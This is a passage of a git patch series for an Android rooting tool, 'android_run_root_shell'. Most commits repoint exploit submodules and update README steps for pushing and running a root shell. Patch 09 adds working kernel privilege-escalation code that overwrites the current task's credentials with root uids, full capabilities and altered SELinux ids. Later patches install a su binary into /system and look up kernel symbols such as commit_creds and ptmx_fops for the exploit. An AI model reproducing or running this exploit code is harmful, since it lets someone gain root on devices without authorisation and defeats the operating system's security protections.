From d04d55735651583b5d2ec750314ed84dc03462e4 Mon Sep 17 00:00:00 2001 From: scoty755 Date: Mon, 10 Mar 2014 18:14:04 +0900 Subject: [PATCH 01/26] update subprojects --- .gitmodules | 2 +- device_database | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/.gitmodules b/.gitmodules index c257cea..29178e0 100644 --- a/.gitmodules +++ b/.gitmodules @@ -3,7 +3,7 @@ url = git://github.com/android-rooting-tools/libdiagexploit.git [submodule "device_database"] path = device_database - url = git://github.com/android-rooting-tools/android_device_database.git + url = https://github.com/scoty755/android_device_database.git [submodule "libperf_event_exploit"] path = libperf_event_exploit url = git://github.com/android-rooting-tools/libperf_event_exploit.git diff --git a/device_database b/device_database index 0710f26..90b70ce 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 0710f266b7969a70d70a534a199205babbe90493 +Subproject commit 90b70ce0eaf5ce993e347d1e11b25025f542743d From 2f8ce84c21489dd23957969d94f208f40436aa1d Mon Sep 17 00:00:00 2001 From: scoty755 Date: Tue, 11 Mar 2014 18:42:47 +0900 Subject: [PATCH 02/26] update subprojects --- device_database | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/device_database b/device_database index 90b70ce..5a6ecd5 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 90b70ce0eaf5ce993e347d1e11b25025f542743d +Subproject commit 5a6ecd515bf61bf7eb79a244d3a54d195db3c1d3 From 4fd9163afdd4d0a05801d9d2bd417fed5ab59420 Mon Sep 17 00:00:00 2001 From: scoty755 Date: Wed, 16 Apr 2014 04:43:50 +0900 Subject: [PATCH 03/26] update subprojects --- device_database | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/device_database b/device_database index 5a6ecd5..9313fa6 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 5a6ecd515bf61bf7eb79a244d3a54d195db3c1d3 +Subproject commit 9313fa6af99bef335b39aadab0c271ce7fd40ca1 From bc9670de7da3b9627a7197415f8972c500115072 Mon Sep 17 00:00:00 2001 From: scoty755 Date: Sun, 20 Apr 2014 20:32:34 +0900 Subject: [PATCH 04/26] update subprojects --- device_database | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/device_database b/device_database index 9313fa6..79245f9 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 9313fa6af99bef335b39aadab0c271ce7fd40ca1 +Subproject commit 79245f93d86cf629f032c2d3161d39edfac9a781 From 455ecae1cf80286fce231aa8dcb8cdc7d85fc6f2 Mon Sep 17 00:00:00 2001 From: scoty755 Date: Fri, 16 May 2014 00:26:31 +0900 Subject: [PATCH 05/26] update subprojects --- device_database | 2 +- libexploit | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/device_database b/device_database index 79245f9..2dfd89a 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 79245f93d86cf629f032c2d3161d39edfac9a781 +Subproject commit 2dfd89a5ff70802c3044b67c96539e743d7f1320 diff --git a/libexploit b/libexploit index 668780f..6856cf2 160000 --- a/libexploit +++ b/libexploit @@ -1 +1 @@ -Subproject commit 668780f94d953d1fab30dec8d98722017becdf8d +Subproject commit 6856cf2dbee7b1da9c2c148729ce393625fff515 From cc597838a4dddc8313414ef9277348be7ee16698 Mon Sep 17 00:00:00 2001 From: scoty755 Date: Fri, 16 May 2014 00:54:59 +0900 Subject: [PATCH 06/26] Change the module:libexploit --- .gitmodules | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.gitmodules b/.gitmodules index 29178e0..a2a6396 100644 --- a/.gitmodules +++ b/.gitmodules @@ -21,7 +21,7 @@ url = https://github.com/android-rooting-tools/libfb_mem_exploit.git [submodule "libexploit"] path = libexploit - url = https://github.com/android-rooting-tools/libexploit.git + url = git@github.com:scoty755/libexploit.git [submodule "libmsm_cameraconfig_exploit"] path = libmsm_cameraconfig_exploit url = git://github.com/fi01/libmsm_cameraconfig_exploit.git From cb3dcd477cb562ed09abfc714395e9292265e484 Mon Sep 17 00:00:00 2001 From: scoty755 Date: Thu, 22 May 2014 18:40:34 +0900 Subject: [PATCH 07/26] update README.md --- README.md | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/README.md b/README.md index e59b0fe..0463a05 100644 --- a/README.md +++ b/README.md @@ -13,7 +13,7 @@ Building `export PATH=ANDK_DIR:$PATH` * In another directory clone this repo: - `git clone --recursive https://github.com/android-rooting-tools/android_run_root_shell` + `git clone --recursive https://github.com/scoty755/android_run_root_shell.git` * Change to the directory where the repo was cloned `cd android_run_root_shell` @@ -22,7 +22,7 @@ Building `ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk` * If all goes well you will get the compiled binary at: - `./libs/armeabi/run_root_shell` + `./libs/armeabi/run_root_shell` and `./device_database/device.db` Running @@ -41,10 +41,10 @@ Running `sudo adb start-server` * Transfer run_root_shell to a temporary directory on the phone: - `adb push run_root_shell /data/local` + `adb push run_root_shell /data/local/tmp` and `adb push device.db /data/local/tmp` * Ensure that run_root_shell has execute permissions: - `adb shell chmod 777 /data/local/run_root_shell` + `adb shell chmod 777 /data/local/tmp/*` * Run the command on the phone: - `adb shell /data/local/run_root_shell` + `adb shell /data/local/tmp/run_root_shell` From 6f850026c0e242d6011006a350be94678641d943 Mon Sep 17 00:00:00 2001 From: Hiroyuki Ikezoe Date: Sun, 4 May 2014 06:47:39 +0900 Subject: [PATCH 08/26] Expand tab. --- mm.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/mm.c b/mm.c index 44419f6..ab913fd 100644 --- a/mm.c +++ b/mm.c @@ -220,7 +220,7 @@ run_with_mmap(memory_callback_t callback) return attempt_exploit(ptmx_fops_fsync_address, (unsigned long int)&setup_mmap_by_fsync, 0, - run_callback_with_fsync_and_mmap, callback); + run_callback_with_fsync_and_mmap, callback); } static bool From 4879632b998fbebf83ebe4581b81d05315b98622 Mon Sep 17 00:00:00 2001 From: fi01 Date: Thu, 18 Sep 2014 00:15:02 +0900 Subject: [PATCH 09/26] Try to modify in struct cred directly when commit_creds() is failed. --- main.c | 174 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++- 1 file changed, 173 insertions(+), 1 deletion(-) diff --git a/main.c b/main.c index 60f5cc0..0375271 100644 --- a/main.c +++ b/main.c @@ -18,10 +18,171 @@ #include "libexploit/exploit.h" #include "libkallsyms/kallsyms_in_memory.h" +#define THREAD_SIZE 8192 + +#define KERNEL_START 0xc0000000 + +struct thread_info; +struct task_struct; +struct cred; +struct kernel_cap_struct; +struct task_security_struct; +struct list_head; + +struct thread_info { + unsigned long flags; + int preempt_count; + unsigned long addr_limit; + struct task_struct *task; + + /* ... */ +}; + +struct kernel_cap_struct { + unsigned long cap[2]; +}; + +struct cred { + unsigned long usage; + uid_t uid; + gid_t gid; + uid_t suid; + gid_t sgid; + uid_t euid; + gid_t egid; + uid_t fsuid; + gid_t fsgid; + unsigned long securebits; + struct kernel_cap_struct cap_inheritable; + struct kernel_cap_struct cap_permitted; + struct kernel_cap_struct cap_effective; + struct kernel_cap_struct cap_bset; + unsigned char jit_keyring; + void *thread_keyring; + void *request_key_auth; + void *tgcred; + struct task_security_struct *security; + + /* ... */ +}; + +struct list_head { + struct list_head *next; + struct list_head *prev; +}; + +struct task_security_struct { + unsigned long osid; + unsigned long sid; + unsigned long exec_sid; + unsigned long create_sid; + unsigned long keycreate_sid; + unsigned long sockcreate_sid; +}; + + +struct task_struct_partial { + struct list_head cpu_timers[3]; + struct cred *real_cred; + struct cred *cred; + struct cred *replacement_session_keyring; + char comm[16]; +}; + +static inline struct thread_info * +current_thread_info(void) +{ + register unsigned long sp asm ("sp"); + return (struct thread_info *)(sp & ~(THREAD_SIZE - 1)); +} + +static bool +is_cpu_timer_valid(struct list_head *cpu_timer) +{ + if (cpu_timer->next != cpu_timer->prev) { + return false; + } + + if ((unsigned long int)cpu_timer->next < KERNEL_START) { + return false; + } + + return true; +} + +static void +obtain_root_privilege_by_modify_task_cred(void) +{ + struct thread_info *info; + struct cred *cred; + struct task_security_struct *security; + int i; + + info = current_thread_info(); + cred = NULL; + + for (i = 0; i < 0x400; i+= 4) { + struct task_struct_partial *task = ((void *)info->task) + i; + + if (is_cpu_timer_valid(&task->cpu_timers[0]) + && is_cpu_timer_valid(&task->cpu_timers[1]) + && is_cpu_timer_valid(&task->cpu_timers[2]) + && task->real_cred == task->cred) { + cred = task->cred; + break; + } + } + + if (cred == NULL) { + return; + } + + cred->uid = 0; + cred->gid = 0; + cred->suid = 0; + cred->sgid = 0; + cred->euid = 0; + cred->egid = 0; + cred->fsuid = 0; + cred->fsgid = 0; + + cred->cap_inheritable.cap[0] = 0xffffffff; + cred->cap_inheritable.cap[1] = 0xffffffff; + cred->cap_permitted.cap[0] = 0xffffffff; + cred->cap_permitted.cap[1] = 0xffffffff; + cred->cap_effective.cap[0] = 0xffffffff; + cred->cap_effective.cap[1] = 0xffffffff; + cred->cap_bset.cap[0] = 0xffffffff; + cred->cap_bset.cap[1] = 0xffffffff; + + security = cred->security; + if (security) { + if (security->osid != 0 + && security->sid != 0 + && security->exec_sid == 0 + && security->create_sid == 0 + && security->keycreate_sid == 0 + && security->sockcreate_sid == 0) { + security->osid = 1; + security->sid = 1; + } + } +} + +static void +obtain_root_privilege_by_commit_creds(void) +{ + commit_creds(prepare_kernel_cred(0)); +} + +static void (*obtain_root_privilege_func)(void); + void obtain_root_privilege(void) { - commit_creds(prepare_kernel_cred(0)); + if (obtain_root_privilege_func) { + obtain_root_privilege_func(); + } } static bool @@ -30,8 +191,19 @@ run_obtain_root_privilege(void *user_data) int fd; int ret; + obtain_root_privilege_func = obtain_root_privilege_by_commit_creds; + fd = open(PTMX_DEVICE, O_WRONLY); + ret = fsync(fd); + + if (getuid() != 0) { + printf("commit_creds(): failed. Try to hack task->cred.\n"); + + obtain_root_privilege_func = obtain_root_privilege_by_modify_task_cred; + ret = fsync(fd); + } + close(fd); return (ret == 0); From 7d446d8a3107cb23fc21aacbd6420df95c4b82a2 Mon Sep 17 00:00:00 2001 From: scoty755 Date: Sun, 1 Feb 2015 08:55:03 +0900 Subject: [PATCH 10/26] Minor cleaning --- .gitmodules.BACKUP.6814.gitmodules | 38 ------------------------- .gitmodules.BASE.6814.gitmodules | 36 ----------------------- .gitmodules.BASE.6814.gitmodules.swp | Bin 12288 -> 0 bytes .gitmodules.LOCAL.6814.gitmodules | 36 ----------------------- .gitmodules.LOCAL.6814.gitmodules.swp | Bin 12288 -> 0 bytes .gitmodules.REMOTE.6814.gitmodules | 9 ------ .gitmodules.REMOTE.6814.gitmodules.swp | Bin 12288 -> 0 bytes .gitmodules.swp | Bin 12288 -> 0 bytes libdiagexploit | 1 - libfb_mem_exploit | 1 - libfj_hdcp_exploit | 1 - libget_user_exploit | 1 - libmsm_acdb_exploit | 1 - libmsm_cameraconfig_exploit | 1 - libperf_event_exploit | 1 - libput_user_exploit | 1 - libsqlite | 1 - 17 files changed, 128 deletions(-) delete mode 100644 .gitmodules.BACKUP.6814.gitmodules delete mode 100644 .gitmodules.BASE.6814.gitmodules delete mode 100644 .gitmodules.BASE.6814.gitmodules.swp delete mode 100644 .gitmodules.LOCAL.6814.gitmodules delete mode 100644 .gitmodules.LOCAL.6814.gitmodules.swp delete mode 100644 .gitmodules.REMOTE.6814.gitmodules delete mode 100644 .gitmodules.REMOTE.6814.gitmodules.swp delete mode 100644 .gitmodules.swp delete mode 160000 libdiagexploit delete mode 160000 libfb_mem_exploit delete mode 160000 libfj_hdcp_exploit delete mode 160000 libget_user_exploit delete mode 160000 libmsm_acdb_exploit delete mode 160000 libmsm_cameraconfig_exploit delete mode 160000 libperf_event_exploit delete mode 160000 libput_user_exploit delete mode 160000 libsqlite diff --git a/.gitmodules.BACKUP.6814.gitmodules b/.gitmodules.BACKUP.6814.gitmodules deleted file mode 100644 index 6b3e877..0000000 --- a/.gitmodules.BACKUP.6814.gitmodules +++ /dev/null @@ -1,38 +0,0 @@ -[submodule "device_database"] - path = device_database -<<<<<<< HEAD - url = https://github.com/scoty755/android_device_database.git -[submodule "libperf_event_exploit"] - path = libperf_event_exploit - url = git://github.com/android-rooting-tools/libperf_event_exploit.git -[submodule "libmsm_acdb_exploit"] - path = libmsm_acdb_exploit - url = git://github.com/fi01/libmsm_acdb_exploit.git -[submodule "libfj_hdcp_exploit"] - path = libfj_hdcp_exploit - url = git://github.com/fi01/libfj_hdcp_exploit.git -======= - url = git://github.com/android-rooting-tools/android_device_database.git ->>>>>>> fetch -[submodule "libkallsyms"] - path = libkallsyms - url = https://github.com/android-rooting-tools/libkallsyms.git -[submodule "libexploit"] - path = libexploit -<<<<<<< HEAD - url = git@github.com:scoty755/libexploit.git -[submodule "libmsm_cameraconfig_exploit"] - path = libmsm_cameraconfig_exploit - url = git://github.com/fi01/libmsm_cameraconfig_exploit.git -[submodule "libput_user_exploit"] - path = libput_user_exploit - url = https://github.com/fi01/libput_user_exploit.git -[submodule "libget_user_exploit"] - path = libget_user_exploit - url = https://github.com/fi01/libget_user_exploit.git -[submodule "libsqlite"] - path = libsqlite - url = https://github.com/android-rooting-tools/android_libsqlite.git -======= - url = https://github.com/android-rooting-tools/libexploit.git ->>>>>>> fetch diff --git a/.gitmodules.BASE.6814.gitmodules b/.gitmodules.BASE.6814.gitmodules deleted file mode 100644 index c257cea..0000000 --- a/.gitmodules.BASE.6814.gitmodules +++ /dev/null @@ -1,36 +0,0 @@ -[submodule "libdiagexploit"] - path = libdiagexploit - url = git://github.com/android-rooting-tools/libdiagexploit.git -[submodule "device_database"] - path = device_database - url = git://github.com/android-rooting-tools/android_device_database.git -[submodule "libperf_event_exploit"] - path = libperf_event_exploit - url = git://github.com/android-rooting-tools/libperf_event_exploit.git -[submodule "libmsm_acdb_exploit"] - path = libmsm_acdb_exploit - url = git://github.com/fi01/libmsm_acdb_exploit.git -[submodule "libfj_hdcp_exploit"] - path = libfj_hdcp_exploit - url = git://github.com/fi01/libfj_hdcp_exploit.git -[submodule "libkallsyms"] - path = libkallsyms - url = https://github.com/android-rooting-tools/libkallsyms.git -[submodule "libfb_mem_exploit"] - path = libfb_mem_exploit - url = https://github.com/android-rooting-tools/libfb_mem_exploit.git -[submodule "libexploit"] - path = libexploit - url = https://github.com/android-rooting-tools/libexploit.git -[submodule "libmsm_cameraconfig_exploit"] - path = libmsm_cameraconfig_exploit - url = git://github.com/fi01/libmsm_cameraconfig_exploit.git -[submodule "libput_user_exploit"] - path = libput_user_exploit - url = https://github.com/fi01/libput_user_exploit.git -[submodule "libget_user_exploit"] - path = libget_user_exploit - url = https://github.com/fi01/libget_user_exploit.git -[submodule "libsqlite"] - path = libsqlite - url = https://github.com/android-rooting-tools/android_libsqlite.git diff --git a/.gitmodules.BASE.6814.gitmodules.swp b/.gitmodules.BASE.6814.gitmodules.swp deleted file mode 100644 index f95c3ac4dc6d1da916b02900b7804a479bd47188..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 12288 zcmeI2F>ljA6vtm!P$(@GY_NosHFiQNMMw-SWMJq7WkKjT+n2=T>@&V|p%MZib>joT z#K_FRfcOSTAR#7pkPrhatUQOfsjqTLI{|u@{<8euyZqn%>{yEOy!MT&YmH@R5%8D? z7>4h!fBST=_T?mi_LbSp<9|3tb*)&n*0{f_)UdS@rjArTm*s^IM}_VcM>BfoU>sFpFi2xBG0z`la5CI}U1c(3;_@4=wqy~?0gNMeOJTpGm ztn>JiPDFqR5CI}U1c(3;AOb{y2oM1xKm>@uKS+QF0I%u*w~t`+`2TdRa0B=yw zP!CXD)B@@->I3%k8ubE|_r_3k5CI}U1c(3;AOb{y2>ks7>RBoqml^|O5`EFlCq4(6 z=lCirraW8u$Y&V$TSh6Vizt(!r|-(phIpXk{Fv=1+|-%(dlSPHLA75m zY^^o^?7NduPE2Y}R- znT?%|jTt0{3b8Q3gqWBZc@B1*yWkSB6+KIzEWh`h@7?blOHrQNzI$`6(X|!{9LES5 z2Ji2D`}DB(^%Nn}6KX4q|K%9fwIb14quwDztA1FAZ6wq}>mc zldxFWqeORU$w`DzHjVs51iq7`(J0`^0pr}Zpga_Q%9*rQZ(m_Y<7C*(t&kjDq1dHDao`2GLoC?W4a z&p;t)9drWp;|L+Upy!|s&@IqO(9bzSK7(F?c0k*pOQ6%B8tBboLSBM)Koryk&4WH3 zBIGsb1&D&KfEGaCp`TsQTTs^9HV6+SfCP{L5xs(tNIpxanEMOSj4`?QJ*%--|2Prl(CK$CU(p&-BL<&rQ0WjlIvj6}9 diff --git a/.gitmodules.REMOTE.6814.gitmodules b/.gitmodules.REMOTE.6814.gitmodules deleted file mode 100644 index d56e434..0000000 --- a/.gitmodules.REMOTE.6814.gitmodules +++ /dev/null @@ -1,9 +0,0 @@ -[submodule "device_database"] - path = device_database - url = git://github.com/android-rooting-tools/android_device_database.git -[submodule "libkallsyms"] - path = libkallsyms - url = https://github.com/android-rooting-tools/libkallsyms.git -[submodule "libexploit"] - path = libexploit - url = https://github.com/android-rooting-tools/libexploit.git diff --git a/.gitmodules.REMOTE.6814.gitmodules.swp b/.gitmodules.REMOTE.6814.gitmodules.swp deleted file mode 100644 index 87fd10ef12afd581bd0addf331ccba61b8ba137e..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 12288 zcmeI&Jxjwt7zgmHTL)jLn^UZFlGa))f`eiQha!~fA`&hyHldeX$X(Pf>Zj4~BDgz? zxcCX&ywrx8EQ+`&|AU9)p1b48{kGD_ZX6%~TKQcZ0-W+@Y*^@oI9=+~-ajdXW_7FpyT_#oU~1blPnz;ar+DauXi7 zR+2`Oge82BG1E}TL++-`6Gp$=I~;V4&8_Cfr*yF#RuF(dL13P=)|-tiwN_u%mTO0a zT`V8~0SG_<0uX=z1Rwx`|1BWn3b|HKoSQzgI-M(}dAh^|0SG_<0uX=z1Rwwb2tWV= z5P-lR6re64!v#X_RAm4E=fD4-774jmaiii)MPEft#hW_!GChBr-NAqW1Rwwb2tWV= z5P$##AOHaf{GLEHO_;W$`BKJW+sqor{nR!b9_G#Bde%7}L_=M2&V88G1`sl5`x3jcbH;ZrbSXmY ztZYc|7XSkT5@JVUVPfcn7?@x|V&yrp^WzeScBFbIeP#LH^SyVUdpAURcK!CX4P&Xc z062~VwEfRFe|&vd`hFTfIznxy^ZyuKziLNRH<)u-h<0_=k86Q&STOqGPS?>~6HXHH zj*@1}S60j;VRj8mi;Gq)gfdyjjfL-8ank8dSkmJ`VAjw*6mAl5Il3;r5dk8w7Xq`e zaACfldY-MEG3HL*+RI1eLj;Hb5g-CYfCvx)B0vO)zyTqkq7ppDy&TH+b1r+9v}g88 z4_au{E6TPypSohtlnP3K}KTgX(rY zsBRwwMcAXqlkYQ>q2;iU$IKC(rr#>sZ;_v#LXqD{DwhUzvYhuC>!q>M8^+c3)ioFb zpPh#uH=7=W*-uHfSrEwWQ0i5b&+EbRd5kvkI*ifI>Q%c8c@?{S%XhftGR15rd$p|H zjIkB-^J{Kep6f(K$EKO}jcDcpy~23u`7+0~ivsF)J)&-(5^^#$yqgh^n-<@~p7o+E f#y#{r#ytj^Oemdxl} Date: Sun, 1 Feb 2015 09:03:55 +0900 Subject: [PATCH 11/26] libexploit: Change the referenced sub-module --- .gitmodules | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.gitmodules b/.gitmodules index d56e434..d55c766 100644 --- a/.gitmodules +++ b/.gitmodules @@ -6,4 +6,4 @@ url = https://github.com/android-rooting-tools/libkallsyms.git [submodule "libexploit"] path = libexploit - url = https://github.com/android-rooting-tools/libexploit.git + url = https://github.com/scoty755/libexploit.git From 84383e17d5162743b61606e847d865cd3055d101 Mon Sep 17 00:00:00 2001 From: scoty755 Date: Sun, 1 Feb 2015 09:29:06 +0900 Subject: [PATCH 12/26] Update submodule --- libexploit | 2 +- libkallsyms | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/libexploit b/libexploit index 6856cf2..c103019 160000 --- a/libexploit +++ b/libexploit @@ -1 +1 @@ -Subproject commit 6856cf2dbee7b1da9c2c148729ce393625fff515 +Subproject commit c103019dc5d35c718882c35a0249af92de1b9d6c diff --git a/libkallsyms b/libkallsyms index 4e8d619..e0072f6 160000 --- a/libkallsyms +++ b/libkallsyms @@ -1 +1 @@ -Subproject commit 4e8d619dd4be4fecf5eb6ea36d6d2fd14e6c32a0 +Subproject commit e0072f6130f27be502bc8b7e5de639e4d0cc3b7c From a6d6c496902635fa630fcdaab038f0920b4079c1 Mon Sep 17 00:00:00 2001 From: scoty755 Date: Sun, 1 Feb 2015 09:51:07 +0900 Subject: [PATCH 13/26] device_database: Change the referenced sub-module --- .gitmodules | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.gitmodules b/.gitmodules index d55c766..0c5332b 100644 --- a/.gitmodules +++ b/.gitmodules @@ -1,6 +1,6 @@ [submodule "device_database"] path = device_database - url = git://github.com/android-rooting-tools/android_device_database.git + url = https://github.com/scoty755/android_device_database.git [submodule "libkallsyms"] path = libkallsyms url = https://github.com/android-rooting-tools/libkallsyms.git From 63da2b646ff4e0b9a226bf214dc5d86effeca25d Mon Sep 17 00:00:00 2001 From: scoty755 Date: Sun, 1 Feb 2015 09:53:40 +0900 Subject: [PATCH 14/26] Update submodule --- device_database | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/device_database b/device_database index 2dfd89a..ae49e23 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 2dfd89a5ff70802c3044b67c96539e743d7f1320 +Subproject commit ae49e23595d3adc8aaf588f1e3117ba5099b527d From c5e53f0c7ead39db5de3f49e879f2497818d1e1d Mon Sep 17 00:00:00 2001 From: scoty755 Date: Sun, 1 Feb 2015 17:11:35 +0900 Subject: [PATCH 15/26] Update submodule --- libexploit | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/libexploit b/libexploit index c103019..a2b6436 160000 --- a/libexploit +++ b/libexploit @@ -1 +1 @@ -Subproject commit c103019dc5d35c718882c35a0249af92de1b9d6c +Subproject commit a2b6436aad1fd10da96f91dc1668dc87f159b998 From 02c47631f3871d1021aaf629475939a5fc791161 Mon Sep 17 00:00:00 2001 From: scoty755 Date: Thu, 12 Feb 2015 20:38:47 +0900 Subject: [PATCH 16/26] Update submodule --- libexploit | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/libexploit b/libexploit index a2b6436..7f1c97f 160000 --- a/libexploit +++ b/libexploit @@ -1 +1 @@ -Subproject commit a2b6436aad1fd10da96f91dc1668dc87f159b998 +Subproject commit 7f1c97fa1f85b5a7678fc81ad6f0f81a8322a031 From cb77b9c8cd11c320029968ec47009be351e1f1b7 Mon Sep 17 00:00:00 2001 From: scoty755 Date: Fri, 13 Feb 2015 23:04:37 +0900 Subject: [PATCH 17/26] Add the installation function of su binary --- main.c | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/main.c b/main.c index 0375271..79ac8a4 100644 --- a/main.c +++ b/main.c @@ -17,6 +17,7 @@ #include "ptmx.h" #include "libexploit/exploit.h" #include "libkallsyms/kallsyms_in_memory.h" +#include #define THREAD_SIZE 8192 @@ -376,6 +377,12 @@ main(int argc, char **argv) } else { execl("/system/bin/sh", "/system/bin/sh", "-c", command, NULL); } + + if ((fopen("/data/local/tmp/su", "r")) != NULL){ + system("mount -o rw,remount /system"); + system("cp /data/local/tmp/su /system/xbin"); + system("mount -o ro,remount /system"); + } exit(EXIT_SUCCESS); } From 8ea5b5f1f6d8f5ff737baed8089c159bd9669339 Mon Sep 17 00:00:00 2001 From: scoty755 Date: Mon, 16 Feb 2015 00:20:26 +0900 Subject: [PATCH 18/26] Grant permission to su binary --- main.c | 1 + 1 file changed, 1 insertion(+) diff --git a/main.c b/main.c index 79ac8a4..baab536 100644 --- a/main.c +++ b/main.c @@ -381,6 +381,7 @@ main(int argc, char **argv) if ((fopen("/data/local/tmp/su", "r")) != NULL){ system("mount -o rw,remount /system"); system("cp /data/local/tmp/su /system/xbin"); + system("chmod 644 /system/xbin/su"); system("mount -o ro,remount /system"); } From d21884ff876d1c0ecf31c49822a1728eccd133e1 Mon Sep 17 00:00:00 2001 From: scoty755 Date: Sat, 4 Jul 2015 12:45:10 +0900 Subject: [PATCH 19/26] Merge function of get_essential_address --- Android.mk | 2 + get_address.c | 226 ++++++++++++++++++++++++++++++ get_root.c | 380 +++++++++++++++++++++++++++++++++++++++++++++++++ main.c | 381 +++----------------------------------------------- 4 files changed, 629 insertions(+), 360 deletions(-) create mode 100644 get_address.c create mode 100644 get_root.c diff --git a/Android.mk b/Android.mk index 9a4970f..8c474f7 100644 --- a/Android.mk +++ b/Android.mk @@ -4,6 +4,8 @@ include $(CLEAR_VARS) LOCAL_SRC_FILES := \ cred.c \ + get_address.c \ + get_root.c \ kallsyms.c \ main.c \ mm.c \ diff --git a/get_address.c b/get_address.c new file mode 100644 index 0000000..7906063 --- /dev/null +++ b/get_address.c @@ -0,0 +1,226 @@ +#include +#include +#include +#include +#include +#include +#define _LARGEFILE64_SOURCE +#include +#include +#include +#include + +#include +#include "device_database.h" +#include "cred.h" +#include "mm.h" +#include "ptmx.h" +#include "libexploit/exploit.h" +#include "libkallsyms/kallsyms_in_memory.h" + +static void *vmalloc_exec; + +static bool +has_all_essential_addresses(void) +{ + if (prepare_kernel_cred + && commit_creds + && remap_pfn_range + && vmalloc_exec + && ptmx_fops) { + return true; + } + + return false; +} + +bool +setup_vmalloc_exec_address(void) +{ + if (vmalloc_exec) { + return true; + } + + vmalloc_exec = (void *)device_get_symbol_address(DEVICE_SYMBOL(vmalloc_exec)); + + if (!vmalloc_exec && kallsyms_exist()) { + vmalloc_exec = (void *)kallsyms_get_symbol_address("vmalloc_exec"); + } + + return !!vmalloc_exec; +} + +static bool +find_ptmx_fops_address(kallsyms *info, void *mem, size_t length) +{ + find_ptmx_fops_hint_t hint; + + hint.ptmx_open_address = kallsyms_in_memory_lookup_name(info, "ptmx_open"); + if (!hint.ptmx_open_address) { + return false; + } + + hint.tty_release_address = kallsyms_in_memory_lookup_name(info, "tty_release"); + if (!hint.tty_release_address) { + return false; + } + + hint.tty_fasync_address = kallsyms_in_memory_lookup_name(info, "tty_fasync"); + if (!hint.tty_fasync_address) { + return false; + } + + return setup_ptmx_fops_address_in_memory(mem, length, &hint); +} + +static bool +find_variables_in_memory(void *mem, size_t length) +{ + kallsyms *info; + + printf("Search address in memory...\n"); + + info = kallsyms_in_memory_init(mem, length); + if (info) { + printf("Using kallsyms_in_memory...\n"); + + if (!prepare_kernel_cred) { + prepare_kernel_cred = (prepare_kernel_cred_t)kallsyms_in_memory_lookup_name(info, "prepare_kernel_cred"); + } + + if (!commit_creds) { + commit_creds = (commit_creds_t)kallsyms_in_memory_lookup_name(info, "commit_creds"); + } + + if (!remap_pfn_range) { + remap_pfn_range = (void *)kallsyms_in_memory_lookup_name(info, "remap_pfn_range"); + } + + if (!vmalloc_exec) { + vmalloc_exec = (void *)kallsyms_in_memory_lookup_name(info, "vmalloc_exec"); + } + + if (!ptmx_fops) { + ptmx_fops = (void *)kallsyms_in_memory_lookup_name(info, "ptmx_fops"); + + if (!ptmx_fops) { + find_ptmx_fops_address(info, mem, length); + } + } + + kallsyms_in_memory_free(info); + + if (has_all_essential_addresses()) { + return true; + } + } + + setup_prepare_kernel_cred_address_in_memory(mem, length); + setup_commit_creds_address_in_memory(mem, length); + + return has_all_essential_addresses(); +} + +static bool +setup_variables(void) +{ + setup_prepare_kernel_cred_address(); + setup_commit_creds_address(); + setup_remap_pfn_range_address(); + setup_vmalloc_exec_address(); + setup_ptmx_fops_address(); + + if (has_all_essential_addresses()) { + return true; + } + + printf("Try to find address in memory...\n"); + if (!run_with_mmap(find_variables_in_memory)) { + printf("\n"); + run_with_memcpy(find_variables_in_memory); + } + + if (has_all_essential_addresses()) { + return true; + } + + if (!prepare_kernel_cred) { + printf("Failed to get prepare_kernel_cred address.\n"); + } + + if (!commit_creds) { + printf("Failed to get commit_creds address.\n"); + } + + if (!remap_pfn_range) { + printf("Failed to get remap_pfn_range address.\n"); + } + + if (!vmalloc_exec) { + printf("Failed to get vmalloc_exec address.\n"); + } + + if (!ptmx_fops) { + printf("Failed to get ptmx_fops address.\n"); + } + + print_reason_device_not_supported(); + + return false; +} + +static void +register_address(void) +{ +#ifdef HAS_SET_SYMBOL_ADDRESS + printf("Essential address are:\n"); + + if (device_set_symbol_address(DEVICE_SYMBOL(prepare_kernel_cred), (unsigned long int)prepare_kernel_cred)) { + printf(" prepare_kernel_cred = %p\n", prepare_kernel_cred); + } + + if (device_set_symbol_address(DEVICE_SYMBOL(commit_creds), (unsigned long int)commit_creds)) { + printf(" commit_creds = %p\n", commit_creds); + } + + if (device_set_symbol_address(DEVICE_SYMBOL(remap_pfn_range), (unsigned long int)remap_pfn_range)) { + printf(" remap_pfn_range = %p\n", remap_pfn_range); + } + + if (device_set_symbol_address(DEVICE_SYMBOL(vmalloc_exec), (unsigned long int)vmalloc_exec)) { + printf(" vmalloc_exec = %p\n", vmalloc_exec); + } + + if (device_set_symbol_address(DEVICE_SYMBOL(ptmx_fops), (unsigned long int)ptmx_fops)) { + printf(" ptmx_fops = %p\n", ptmx_fops); + } +#endif /* HAS_SET_SYMBOL_ADDRESS */ +} + +int +get_address(int argc, char **argv) +{ + device_detected(); + + printf("Try without fb_mem_exploit fist...\n\n"); + set_fb_mem_exploit_enable(false); + + if (!setup_variables()) { + printf("\n\n"); + + printf("Try again with 